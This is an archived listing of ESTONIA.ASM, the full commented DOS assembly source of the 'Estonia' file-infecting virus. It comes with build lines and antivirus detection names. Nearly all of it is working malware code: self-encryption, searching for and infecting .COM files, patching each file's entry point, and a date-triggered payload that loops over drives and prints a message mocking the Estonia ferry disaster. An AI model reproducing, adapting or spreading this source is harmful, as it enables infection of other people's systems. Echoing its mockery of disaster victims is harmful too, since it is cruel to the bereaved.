home *** CD-ROM | disk | FTP | other *** search

---

/ HPAVC / HPAVC CD-ROM.iso / ASM-E.ZIP / ESTONIA.ASM

< prev

next >

Wrap

Assembly Source File  |  1998-01-16  |  11KB  |  233 lines

---

1. ;------------------------------------------------------------------------------- 
2. ;---------------------- ESTONIA.ASM
3. ;------------------------------------------------------------------------------- 
4. ;---- VMAKE LINE: TASM $ /t 
5. ;---- VMAKE LINE: TLINK $ /x /t 
6. ;---- VMAKE LINE: ERASE $.OBJ 
7. ;---- VMAKE LINE: ENDPROC 
8. ;---- Compiled & Linked this will scan as the following:  
9. ;------------------------------------------------------------------------------- 
10. ;---- McAfee  = ESTONIA.400
11. ;---- F-Prot  = Estonia.400 - Generation 1
12. ;---- Avast   = Estonia.400
13. ;---- AVPlite = ES.400
14. ;---- DrSol   = Estonia.400
15. ;---- TBScan  = Estionia.400
16. ;---- Norton  = VLAD.Estonia.400
17. ;---- Sweep   = ES-400
18. ;------------------------------------------------------------------------------- 
19. ;---- God pops up in the strangest places, eh?  
20. ;----  Jesus loves YOU and died so that you can live forever 
21. ;----  in heaven with God.  Believe in Him and when you die  
22. ;----  you will not be dead forever!  
23. ;------------------------------------------------------------------------------- 
24.  
25. ;                      D   A   R   K   M   A   N
26. ;                           Proudly Presents
27. ;                      E   S   T   O   N   I   A
28.  
29. psp          equ     100h
30. virussize    equ     extracopy - code
31. cryptsize    equ     extracopy - crypted - 01h
32. dtaoffset    equ     02h * virussize + psp
33. filetime     equ     dtaoffset + 16h
34. filedate     equ     dtaoffset + 18h
35. filesize     equ     dtaoffset + 1ah
36. filename     equ     dtaoffset + 1eh
37. memsize      equ     dtaoffset + 2bh
38.  
39. estonia      segment
40.              assume  cs:estonia,ds:estonia,es:estonia
41.              org     100h                ; Origin of COM-file
42.  
43. code:
44.              call    viruscode
45. virusid      db      'ES'                ; Estonia Scan-ID
46.  
47. viruscode:
48.              pop     bp                  ; Load BP from stack
49.              sub     bp,offset virusid   ; BP = delta offset
50.  
51.              or      bp,bp               ; BP = 0?
52.              je      crypted             ; Equal? Jump to crypted
53.              std                         ; Set direction flag
54.              lea     bx,[bp+crypted]     ; AX = offset encrypted code
55.              mov     cx,02h              ; Transpose 2 times
56.              mov     dx,cryptsize        ; Decrypt 350 bytes
57. denexttime:
58.              push    cx                  ; Save CX at stack
59.              mov     cx,dx               ; CX = size of encrypted code
60.              mov     di,bx
61.              add     di,dx               ; DI = offset of last encrypted code
62.              mov     si,di               ; SI = offset of last encrypted code
63.              lodsb                       ; Load last plain byte
64.              sub     [bx],al             ; Subtract AL from first encrypt byte
65. denextbyte:
66.              lodsw                       ; Load 2 encrypted bytes
67.              sub     ah,al               ; Subtract AL from AH
68.              mov     al,ah               ; AL = decrypted byte
69.              stosb                       ; Store a decrypted byte
70.              inc     si                  ; Increase SI
71.              loop    denextbyte
72.              pop     cx                  ; Load CX from stack
73.              loop    denexttime
74. crypted:
75.              cld                         ; Clear direction flag
76.              mov     ah,2ah              ; Get system date
77.              int     21h                 ; Do it!
78.              cmp     dx,091bh            ; 27. September?
79.              jb      dontsink            ; Below? Jump to dontsink
80.              cmp     dx,091ch            ; 28. September?
81.              ja      dontsink            ; Above? Jump to dontsink
82.  
83.              xor     al,al               ; Clear AL
84.              mov     cx,19h              ; Destroy drives A-Z
85. formattrack:
86.              push    cx                  ; Save CX at stack
87.              mov     ah,2                ; Read a track
88.              xor     cx,cx               ; Clear CX
89.              xor     dh,dh               ; Clear DH
90.              mov     dl,al
91.              int     13h                 ; Do it! (disk)
92.              inc     al                  ; Increase AL
93.              pop     cx                  ; Load CX from stack
94.              loop    formattrack
95.  
96.              mov     ah,09h              ; Standard output string
97.              lea     dx,message          ; DX = offset of message
98.              int     21h                 ; Do it!
99.              
100.              int     20h                 ; Exit to DOS!
101. dontsink:
102.              mov     ah,4ah              ; Modify memory allocation
103.              mov     bx,1000h            ; The new block size is 65535 bytes
104.              int     21h                 ; Do it!
105.              jc      virusexit           ; Error? Jump to vitusexit
106.  
107.              mov     ah,1ah              ; Set disk transfer address
108.              lea     dx,[bp+dtaoffset]   ; DX = offset of new DTA
109.              int     21h                 ; Do it!
110.  
111.              mov     ah,4eh              ; Find first matching file
112.              mov     cx,22h              ; File attribute hidden+archive
113.              lea     dx,[bp+filespec]    ; DX = offset of filespec
114. findnext:
115.              int     21h                 ; Do it!
116.              jnc     infect              ; No error? Jump to infect
117. virusexit:
118.              mov     ah,1ah              ; Set disk transfer address
119.              mov     dx,80h              ; DX = offset of default DTA
120.              int     21h                 ; Do it!
121.  
122.              mov     di,100h             ; DI = beginning of code
123.              lea     si,[bp+realcode]    ; SI = offset of realcode
124.              push    di                  ; Restore Instruction Pointer (IP)
125.              movsw                       ; Move the real code to the beginning
126.              movsw                       ;  "    "   "    "   "   "      "
127.              movsb                       ;  "    "   "    "   "   "      "
128.              ret                         ; Return!
129. setfileinfo:
130.              mov     cx,[bp+filetime]    ; CX = file time in DTA
131.              mov     dx,[bp+filedate]    ; DX = file date in DTA
132.              mov     ax,5701h            ; Set file data and time
133.              int     21h                 ; Do it!
134. closefile:
135.              mov     ah,3eh              ; Close file
136.              int     21h                 ; Do it!
137.              mov     ah,4fh              ; Find next matching file
138.              jmp     short findnext
139. infect:
140.              mov     cx,virussize        ; Move 400 bytes
141.              lea     di,[bp+extracopy]   ; DI = offset of extracopy
142.              lea     si,[bp+code]        ; SI = offset of code
143.              rep     movsb               ; Create an extra copy of virus
144.  
145.              mov     ax,3d02h            ; Open file (read/write)
146.              lea     dx,[bp+filename]    ; DX = offset of filename in DTA
147.              int     21h                 ; Do it!
148.              jc      closefile           ; Error? Jump to closefile
149.              xchg    ax,bx               ; Exchange AX with BX
150.  
151.              mov     ax,word ptr [bp+filesize]
152.              cmp     ax,05h              ; AX = 5? (AX < 5)
153.              jb      closefile           ; Less? Jump to closefile
154.              cmp     ax,(65535-memsize)  ; AX = 64432? (AX > 64432)
155.              ja      closefile           ; Greater? Jump to closefile
156.  
157.              sub     ax,03h              ; AX = offset of virus code
158.              mov     [bp+offset estoniacode+01h],ax
159.  
160.              mov     ah,3fh              ; Read from file
161.              mov     cx,05h              ; Read 5 bytes
162.              lea     dx,[bp+virussize+realcode]
163.              int     21h                 ; Do it!
164.  
165.              cmp     [bp+virussize+offset realcode+03h],'SE'
166.              je      closefile           ; Infected? Jump to closefile
167.  
168.              lea     di,[bp+virussize+cryptvalues]
169.              in      ax,40h              ; AX = port 40h
170.              stosw                       ; Store AX in crypt values
171.              in      ax,40h              ; AX = port 40h
172.              stosw                       ; Store AX in crypt value
173.  
174.              push    bx                  ; Save BX at stack
175.              lea     bx,[bp+virussize+crypted]
176.              mov     cx,02h              ; Transpose 2 times
177.              mov     dx,cryptsize        ; Encrypt 350 bytes
178. ennexttime:
179.              push    cx                  ; Save CX at stack
180.              mov     cx,dx               ; CX = size of plain code
181.              mov     di,bx               ; DI = offset of plain code
182.              mov     si,bx               ; SI = offset of plain code
183.              inc     di                  ; Increase DI
184. ennextbyte:
185.              lodsw                       ; Load 2 plain bytes
186.              add     al,ah               ; Add AH to AL
187.              stosb                       ; Store a encrypted byte
188.              dec     si                  ; Decrease SI
189.              loop    ennextbyte
190.              add     [bx],al             ; Add AL to plain byte
191.              pop     cx                  ; Load CX from stack
192.              loop    ennexttime
193.              pop     bx                  ; Load BX from stack
194.  
195.              mov     ax,4202h            ; Move file pointer to the end
196.              xor     cx,cx               ; Clear CX
197.              cwd                         ; Convert word to doubleword
198.              int     21h                 ; Do it!
199.  
200.              mov     ah,40h              ; Write to file
201.              mov     cx,virussize        ; Write 400 bytes
202.              lea     dx,[bp+extracopy]   ; DX = offset of extracopy
203.              int     21h                 ; Do it!
204.              cmp     ax,cx               ; Disk full?
205.              jne     infectdone          ; Error? Jump to infectdone
206.  
207.              mov     ax,4200h            ; Move file pointer to the beginning
208.              xor     cx,cx               ; Clear CX
209.              cwd                         ; Convert word to doubleword
210.              int     21h                 ; Do it!
211.  
212.              mov     ah,40h              ; Write to file
213.              mov     cx,05h              ; Write 5 bytes
214.              lea     dx,[bp+estoniacode] ; DX = offset of estoniacode
215.              int     21h                 ; Do it!
216. infectdone:
217.              jmp     setfileinfo
218.  
219. cryptvalues  db      04h dup(?)          ; Cryption values
220. estoniacode  db      0e8h,00h,00h,'ES'   ; New code of infected file
221. realcode     db      0cdh,20h            ; Real code of infected file
222.              db      03h dup(?)
223. filespec     db      '*.COM',00h         ; File specification
224. message      db      'Your drives were ' ; This message will be shown the
225.              db      'on the Estonia...' ; 27 / 28. September and then the
226.              db      ' They DIDN''T sur' ; drives (A-Z) bootsector will
227.              db      'vive!!!',0dh,0ah   ; look like it is being destroyed!!!
228.              db      '$'
229. extracopy:
230.  
231. estonia      ends
232. end          code
233.